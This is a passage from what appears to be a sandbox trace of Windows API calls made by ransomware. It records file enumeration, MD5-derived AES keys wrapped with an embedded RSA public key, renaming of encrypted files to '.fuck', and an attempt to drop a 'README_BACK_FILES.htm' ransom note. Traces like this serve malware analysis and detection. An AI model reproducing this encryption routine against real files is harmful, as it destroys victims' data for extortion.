"c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.341] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.341] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f6788) returned 1 [0240.343] CryptCreateHash (in: hProv=0x28f6788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.343] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.344] CryptHashData (hHash=0x28e8578, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.344] CryptDeriveKey (in: hProv=0x28f6788, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8638) returned 1 [0240.344] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.344] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.344] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f62c0) returned 1 [0240.344] CryptImportPublicKeyInfo (in: hCryptProv=0x28f62c0, dwCertEncodingType=0x1, pInfo=0x28c8898*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c88c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c88d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e6b38) returned 1 [0240.344] CryptEncrypt (in: hKey=0x28e6b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.344] CryptEncrypt (in: hKey=0x28e6b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6678*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f6678*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.345] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6678, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.345] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.345] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.345] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.345] CloseHandle (hObject=0xffffffff) returned 1 [0240.345] CloseHandle (hObject=0xffffffff) returned 1 [0240.345] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.345] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.346] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.gsg")) returned 0 [0240.346] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.fuck")) returned 0 [0240.347] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.347] CryptDestroyKey (hKey=0x28e8638) returned 1 [0240.347] CryptReleaseContext (hProv=0x28f6788, dwFlags=0x0) returned 1 [0240.347] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.347] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8578 [0240.347] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.347] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.347] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e8638 [0240.347] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.347] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.348] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.348] GetLastError () returned 0x5 [0240.348] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.348] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.348] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.349] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.349] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.350] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f63d0) returned 1 [0240.352] CryptCreateHash (in: hProv=0x28f63d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.352] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.352] CryptHashData (hHash=0x28e88b8, pbData=0x28cb5f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.352] CryptDeriveKey (in: hProv=0x28f63d0, Algid=0x6610, hBaseData=0x28e88b8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e6af8) returned 1 [0240.353] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.353] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.353] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f6458) returned 1 [0240.353] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6458, dwCertEncodingType=0x1, pInfo=0x28c83b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c83e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c83f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e7078) returned 1 [0240.353] CryptEncrypt (in: hKey=0x28e7078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.353] CryptEncrypt (in: hKey=0x28e7078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6a30*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f6a30*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.354] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6a30, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.354] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.354] CryptEncrypt (in: hKey=0x28e6af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.354] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.354] CloseHandle (hObject=0xffffffff) returned 1 [0240.354] CloseHandle (hObject=0xffffffff) returned 1 [0240.354] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.354] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.355] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.355] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.356] CryptDestroyHash (hHash=0x28e88b8) returned 1 [0240.356] CryptDestroyKey (hKey=0x28e6af8) returned 1 [0240.356] CryptReleaseContext (hProv=0x28f63d0, dwFlags=0x0) returned 1 [0240.356] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.356] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.356] GetLastError () returned 0x5 [0240.356] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0240.356] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0240.357] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.357] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.358] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.358] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6788) returned 1 [0240.360] CryptCreateHash (in: hProv=0x28f6788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.360] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.360] CryptHashData (hHash=0x28e70f8, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.360] CryptDeriveKey (in: hProv=0x28f6788, Algid=0x6610, hBaseData=0x28e70f8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e6df8) returned 1 [0240.361] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.361] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.361] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f6ab8) returned 1 [0240.361] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6ab8, dwCertEncodingType=0x1, pInfo=0x28c8558*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8588*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8590*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e6ff8) returned 1 [0240.361] CryptEncrypt (in: hKey=0x28e6ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.361] CryptEncrypt (in: hKey=0x28e6ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f7d50*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f7d50*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.361] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f7d50, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.361] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.362] CryptEncrypt (in: hKey=0x28e6df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.362] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.362] CloseHandle (hObject=0xffffffff) returned 1 [0240.362] CloseHandle (hObject=0xffffffff) returned 1 [0240.362] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0240.362] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0240.363] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0240.363] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0240.364] CryptDestroyHash (hHash=0x28e70f8) returned 1 [0240.364] CryptDestroyKey (hKey=0x28e6df8) returned 1 [0240.364] CryptReleaseContext (hProv=0x28f6788, dwFlags=0x0) returned 1 [0240.364] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.364] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.364] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.364] AreFileApisANSI () returned 1 [0240.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.364] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.365] GetLastError () returned 0x5 [0240.365] GetLastError () returned 0x5 [0240.365] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.365] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.365] GetLastError () returned 0x5 [0240.365] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml")) returned 0x20 [0240.365] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.366] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.367] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.367] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.368] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0240.370] 